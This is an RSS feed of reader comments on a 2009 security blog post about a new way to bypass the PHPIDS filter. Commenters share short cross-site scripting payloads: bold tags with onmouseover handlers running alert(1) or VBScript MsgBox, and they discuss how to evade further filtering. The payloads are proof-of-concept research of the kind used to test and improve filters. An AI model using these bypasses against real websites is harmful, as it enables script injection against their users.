<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: New PHPIDS vector</title>
	<atom:link href="http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/</link>
	<description>Javascript blog with messed up syntax inside</description>
	<lastBuildDate>Thu, 26 Jan 2012 01:38:34 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
	<item>
		<title>By: wheelq</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1570</link>
		<dc:creator>wheelq</dc:creator>
		<pubDate>Mon, 15 Jun 2009 11:37:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1570</guid>
		<description>sorry my bad, wrong interpretation ;)</description>
		<content:encoded><![CDATA[<p>sorry my bad, wrong interpretation <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: wheelq</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1569</link>
		<dc:creator>wheelq</dc:creator>
		<pubDate>Mon, 15 Jun 2009 11:25:17 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1569</guid>
		<description>shorter- &lt;b/alt=&quot;1&quot;onmouseover=alert(1)&gt;test&lt;/b&gt;</description>
		<content:encoded><![CDATA[<p>shorter- &lt;b/alt=&#8221;1&#8243;onmouseover=alert(1)&gt;test&lt;/b&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: wheelq</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1568</link>
		<dc:creator>wheelq</dc:creator>
		<pubDate>Mon, 15 Jun 2009 11:23:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1568</guid>
		<description>works also on FF 3.0.11
&lt;b/alt=â€1â€³onmouseover=alert(1) language=VBS&gt;test&lt;/b&gt;</description>
		<content:encoded><![CDATA[<p>works also on FF 3.0.11<br />
&lt;b/alt=â€1â€³onmouseover=alert(1) language=VBS&gt;test&lt;/b&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: whelq</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1567</link>
		<dc:creator>whelq</dc:creator>
		<pubDate>Mon, 15 Jun 2009 11:23:33 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1567</guid>
		<description>works also on FF 3.0.11

&lt;b/alt=&quot;1&quot;onmouseover=alert(1) language=VBS&gt;test&lt;/b&gt;</description>
		<content:encoded><![CDATA[<p>works also on FF 3.0.11</p>
<p>&lt;b/alt=&#8221;1&#8243;onmouseover=alert(1) language=VBS&gt;test&lt;/b&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1561</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 01 Jun 2009 13:56:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1561</guid>
		<description>@Thornmaker

Thanks :)

MsgBox could be used, it would require some filter evasion though because MsgBox is filtered. You could use chr function combined with GetRef to insert a payload in the dom. Or tricks like this:-

&lt;b/alt=&quot;&quot;onmouseover= MsgBox&quot;XSS&quot; language=vbs&gt;test&lt;/b&gt;</description>
		<content:encoded><![CDATA[<p>@Thornmaker</p>
<p>Thanks <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>MsgBox could be used, it would require some filter evasion though because MsgBox is filtered. You could use chr function combined with GetRef to insert a payload in the dom. Or tricks like this:-</p>
<p>&lt;b/alt=&#8221;"onmouseover= MsgBox&#8221;XSS&quot; language=vbs&gt;test&lt;/b&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: thornmaker</title>
		<link>http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1560</link>
		<dc:creator>thornmaker</dc:creator>
		<pubDate>Mon, 01 Jun 2009 13:36:52 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=432#comment-1560</guid>
		<description>awesome!  what is needed to avoid the scripted window dialog?</description>
		<content:encoded><![CDATA[<p>awesome!  what is needed to avoid the scripted window dialog?</p>
]]></content:encoded>
	</item>
</channel>
</rss>

